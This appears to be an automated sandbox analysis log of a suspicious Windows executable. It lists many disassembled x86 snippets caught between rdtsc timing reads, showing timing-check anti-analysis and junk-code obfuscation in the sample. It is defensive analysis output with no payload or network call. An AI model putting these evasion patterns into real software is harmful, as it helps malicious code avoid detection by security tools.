Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10CFB93 second address: 10CFC1F instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F1C29045F06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b push eax 0x0000000c push ebx 0x0000000d push esi 0x0000000e jmp 00007F1C29045F19h 0x00000013 pop esi 0x00000014 pop ebx 0x00000015 nop 0x00000016 mov ebx, 7A4EAFD6h 0x0000001b push dword ptr fs:[00000000h] 0x00000022 sub edi, dword ptr [ebp+122D2868h] 0x00000028 mov dword ptr fs:[00000000h], esp 0x0000002f movzx edi, bx 0x00000032 mov eax, dword ptr [ebp+122D0D61h] 0x00000038 sub dword ptr [ebp+122D1C54h], ecx 0x0000003e push FFFFFFFFh 0x00000040 push 00000000h 0x00000042 push edx 0x00000043 call 00007F1C29045F08h 0x00000048 pop edx 0x00000049 mov dword ptr [esp+04h], edx 0x0000004d add dword ptr [esp+04h], 00000017h 0x00000055 inc edx 0x00000056 push edx 0x00000057 ret 0x00000058 pop edx 0x00000059 ret 0x0000005a mov di, dx 0x0000005d nop 0x0000005e jnl 00007F1C29045F0Eh 0x00000064 push eax 0x00000065 push eax 0x00000066 push edx 0x00000067 push edi 0x00000068 pushad 0x00000069 popad 0x0000006a pop edi 0x0000006b rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10CEAAC second address: 10CEAB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10CEAB0 second address: 10CEB58 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1C29045F10h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push esi 0x00000010 call 00007F1C29045F08h 0x00000015 pop esi 0x00000016 mov dword ptr [esp+04h], esi 0x0000001a add dword ptr [esp+04h], 00000014h 0x00000022 inc esi 0x00000023 push esi 0x00000024 ret 0x00000025 pop esi 0x00000026 ret 0x00000027 jmp 00007F1C29045F12h 0x0000002c push dword ptr fs:[00000000h] 0x00000033 push 00000000h 0x00000035 push ecx 0x00000036 call 00007F1C29045F08h 0x0000003b pop ecx 0x0000003c mov dword ptr [esp+04h], ecx 0x00000040 add dword ptr [esp+04h], 00000017h 0x00000048 inc ecx 0x00000049 push ecx 0x0000004a ret 0x0000004b pop ecx 0x0000004c ret 0x0000004d mov dword ptr fs:[00000000h], esp 0x00000054 mov dword ptr [ebp+122D193Ch], edi 0x0000005a mov eax, dword ptr [ebp+122D0DC5h] 0x00000060 sub dword ptr [ebp+122D1BB1h], ecx 0x00000066 push FFFFFFFFh 0x00000068 sub dword ptr [ebp+122D2E48h], ecx 0x0000006e nop 0x0000006f pushad 0x00000070 ja 00007F1C29045F11h 0x00000076 jmp 00007F1C29045F0Bh 0x0000007b push eax 0x0000007c push edx 0x0000007d ja 00007F1C29045F06h 0x00000083 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10D38E2 second address: 10D3968 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F1C28FAFD76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007F1C28FAFD75h 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push ecx 0x00000014 call 00007F1C28FAFD68h 0x00000019 pop ecx 0x0000001a mov dword ptr [esp+04h], ecx 0x0000001e add dword ptr [esp+04h], 0000001Bh 0x00000026 inc ecx 0x00000027 push ecx 0x00000028 ret 0x00000029 pop ecx 0x0000002a ret 0x0000002b xor edi, dword ptr [ebp+122D360Dh] 0x00000031 je 00007F1C28FAFD6Ch 0x00000037 push ecx 0x00000038 mov di, 8F9Eh 0x0000003c pop edi 0x0000003d push 00000000h 0x0000003f mov dword ptr [ebp+122D2C39h], eax 0x00000045 push 00000000h 0x00000047 jmp 00007F1C28FAFD6Dh 0x0000004c push eax 0x0000004d push eax 0x0000004e push edx 0x0000004f pushad 0x00000050 pushad 0x00000051 popad 0x00000052 push ebx 0x00000053 pop ebx 0x00000054 popad 0x00000055 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10CEB58 second address: 10CEB69 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F1C29045F06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10CDB15 second address: 10CDB20 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007F1C28FAFD66h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10D3B71 second address: 10D3B85 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 ja 00007F1C29045F06h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10D3B85 second address: 10D3B89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10DD6B8 second address: 10DD6E2 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F1C29045F1Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F1C29045F0Ah 0x0000000f rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10DD6E2 second address: 10DD73C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1C28FAFD76h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c pushad 0x0000000d push edi 0x0000000e pop edi 0x0000000f jmp 00007F1C28FAFD79h 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 pushad 0x00000018 js 00007F1C28FAFD66h 0x0000001e jmp 00007F1C28FAFD6Fh 0x00000023 jo 00007F1C28FAFD66h 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10DDA10 second address: 10DDA14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10DDA14 second address: 10DDA1A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10E34E2 second address: 10E34F8 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 ja 00007F1C29045F06h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10E34F8 second address: 10E34FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10E34FC second address: 10E3502 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10E3502 second address: 10E3507 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10E3507 second address: 10E3546 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b pushad 0x0000000c push edi 0x0000000d jmp 00007F1C29045F0Eh 0x00000012 pop edi 0x00000013 jnp 00007F1C29045F19h 0x00000019 jmp 00007F1C29045F13h 0x0000001e popad 0x0000001f mov dword ptr [esp+04h], eax 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10E3546 second address: 10E354D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10E354D second address: 10E3563 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1C29045F12h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10E3563 second address: 10E3567 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10E3567 second address: F0B839 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 stc 0x0000000a push dword ptr [ebp+122D0721h] 0x00000010 cmc 0x00000011 call dword ptr [ebp+122D3306h] 0x00000017 pushad 0x00000018 jmp 00007F1C29045F12h 0x0000001d xor eax, eax 0x0000001f jmp 00007F1C29045F0Dh 0x00000024 mov edx, dword ptr [esp+28h] 0x00000028 add dword ptr [ebp+122D32F9h], esi 0x0000002e mov dword ptr [ebp+122D32F9h], edi 0x00000034 mov dword ptr [ebp+122D34CDh], eax 0x0000003a jg 00007F1C29045F0Ch 0x00000040 mov esi, 0000003Ch 0x00000045 or dword ptr [ebp+122D32F9h], esi 0x0000004b cmc 0x0000004c add esi, dword ptr [esp+24h] 0x00000050 mov dword ptr [ebp+122D32F9h], eax 0x00000056 lodsw 0x00000058 jnl 00007F1C29045F0Ch 0x0000005e add eax, dword ptr [esp+24h] 0x00000062 cmc 0x00000063 mov ebx, dword ptr [esp+24h] 0x00000067 ja 00007F1C29045F1Ah 0x0000006d jg 00007F1C29045F14h 0x00000073 nop 0x00000074 pushad 0x00000075 pushad 0x00000076 push ecx 0x00000077 pop ecx 0x00000078 push edx 0x00000079 pop edx 0x0000007a popad 0x0000007b jmp 00007F1C29045F16h 0x00000080 popad 0x00000081 push eax 0x00000082 pushad 0x00000083 push eax 0x00000084 push edx 0x00000085 push ebx 0x00000086 pop ebx 0x00000087 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10E7D65 second address: 10E7D69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10E7D69 second address: 10E7D75 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F1C29045F06h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10724F7 second address: 10724FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10E716B second address: 10E716F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10E7418 second address: 10E741D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10E741D second address: 10E745C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F1C29045F06h 0x0000000a pop edx 0x0000000b jmp 00007F1C29045F17h 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F1C29045F19h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10E7C28 second address: 10E7C2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 107ADAA second address: 107ADAE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10EDBEA second address: 10EDBFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F1C28FAFD66h 0x0000000a pop esi 0x0000000b jnp 00007F1C28FAFD6Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10EDBFD second address: 10EDC15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 pushad 0x00000007 jmp 00007F1C29045F0Fh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10EDC15 second address: 10EDC1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10F07A4 second address: 10F07A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10F07A8 second address: 10F07C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1C28FAFD76h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10F5E16 second address: 10F5E1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10F4894 second address: 10F4899 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10F4899 second address: 10F48E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1C29045F12h 0x00000009 jc 00007F1C29045F06h 0x0000000f jl 00007F1C29045F06h 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F1C29045F0Eh 0x0000001d jmp 00007F1C29045F15h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10F48E1 second address: 10F48F3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1C28FAFD6Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10F4A79 second address: 10F4A7D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10F4BF7 second address: 10F4C14 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jnc 00007F1C28FAFD66h 0x0000000b ja 00007F1C28FAFD66h 0x00000011 popad 0x00000012 push edx 0x00000013 push edx 0x00000014 pop edx 0x00000015 pop edx 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push ebx 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10F4C14 second address: 10F4C1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10F4C1A second address: 10F4C2C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1C28FAFD6Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10F5063 second address: 10F5067 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10F5067 second address: 10F50A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jo 00007F1C28FAFD66h 0x0000000d pop eax 0x0000000e pop ebx 0x0000000f pushad 0x00000010 pushad 0x00000011 push edx 0x00000012 pop edx 0x00000013 push edi 0x00000014 pop edi 0x00000015 jmp 00007F1C28FAFD71h 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d push ebx 0x0000001e pop ebx 0x0000001f jmp 00007F1C28FAFD74h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10F51FE second address: 10F5216 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1C29045F0Bh 0x00000009 pop ecx 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push esi 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10F5216 second address: 10F521B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10F5346 second address: 10F5371 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1C29045F0Ah 0x00000009 jmp 00007F1C29045F18h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10F5371 second address: 10F5375 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 127BB70 second address: 127BB7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop esi 0x00000006 push ebx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 127BB7A second address: 127BB80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 127BB80 second address: 127BB89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 127D6F9 second address: 127D712 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F1C29045F0Fh 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 127D712 second address: 127D741 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jmp 00007F1C28FAFD72h 0x0000000f jmp 00007F1C28FAFD6Ch 0x00000014 jnc 00007F1C28FAFD66h 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 128007B second address: 128009B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1C29045F16h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 128009B second address: 128009F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 12802F4 second address: 12802F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 1281A15 second address: 1281A1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 1281A1D second address: 1281A28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F1C29045F06h 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 757001A second address: 757004B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1C28FAFD6Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov si, A72Bh 0x0000000f mov ch, 8Bh 0x00000011 popad 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F1C28FAFD74h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 757004B second address: 757004F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 757004F second address: 7570055 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 7570184 second address: 75701F9 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 43A24CDFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov bx, cx 0x0000000c popad 0x0000000d mov esi, dword ptr [772406ECh] 0x00000013 jmp 00007F1C29045F0Eh 0x00000018 test esi, esi 0x0000001a jmp 00007F1C29045F10h 0x0000001f jne 00007F1C29046D77h 0x00000025 pushad 0x00000026 pushfd 0x00000027 jmp 00007F1C29045F0Eh 0x0000002c xor eax, 5AC901A8h 0x00000032 jmp 00007F1C29045F0Bh 0x00000037 popfd 0x00000038 call 00007F1C29045F18h 0x0000003d push eax 0x0000003e push edx 0x0000003f rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 75701F9 second address: 7570228 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push ebp 0x00000007 jmp 00007F1C28FAFD6Ch 0x0000000c mov dword ptr [esp], edi 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F1C28FAFD77h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 7570228 second address: 757022E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 757022E second address: 7570232 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 7570232 second address: 75702B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 call dword ptr [77210B60h] 0x0000000e mov eax, 766BE5E0h 0x00000013 ret 0x00000014 pushad 0x00000015 call 00007F1C29045F0Dh 0x0000001a pop edx 0x0000001b mov ax, 46E3h 0x0000001f popad 0x00000020 push 00000044h 0x00000022 jmp 00007F1C29045F16h 0x00000027 pop edi 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b pushfd 0x0000002c jmp 00007F1C29045F0Dh 0x00000031 sub esi, 437D4896h 0x00000037 jmp 00007F1C29045F11h 0x0000003c popfd 0x0000003d pushfd 0x0000003e jmp 00007F1C29045F10h 0x00000043 xor al, FFFFFFB8h 0x00000046 jmp 00007F1C29045F0Bh 0x0000004b popfd 0x0000004c popad 0x0000004d rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 75702B7 second address: 75702F7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, cx 0x00000006 mov ah, 76h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c jmp 00007F1C28FAFD78h 0x00000011 mov dword ptr [esp], edi 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F1C28FAFD77h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 75702F7 second address: 7570371 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1C29045F19h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [eax] 0x0000000b pushad 0x0000000c push ecx 0x0000000d pushfd 0x0000000e jmp 00007F1C29045F13h 0x00000013 add ecx, 16D3EA9Eh 0x00000019 jmp 00007F1C29045F19h 0x0000001e popfd 0x0000001f pop ecx 0x00000020 mov di, B414h 0x00000024 popad 0x00000025 mov eax, dword ptr fs:[00000030h] 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e call 00007F1C29045F14h 0x00000033 pop ecx 0x00000034 popad 0x00000035 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 7570371 second address: 757039D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F1C28FAFD6Dh 0x00000009 jmp 00007F1C28FAFD6Bh 0x0000000e popfd 0x0000000f mov bx, cx 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push dword ptr [eax+18h] 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 757039D second address: 75703B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1C29045F13h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 75703B4 second address: 75703BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 75703BA second address: 75703BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 7570407 second address: 757040B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
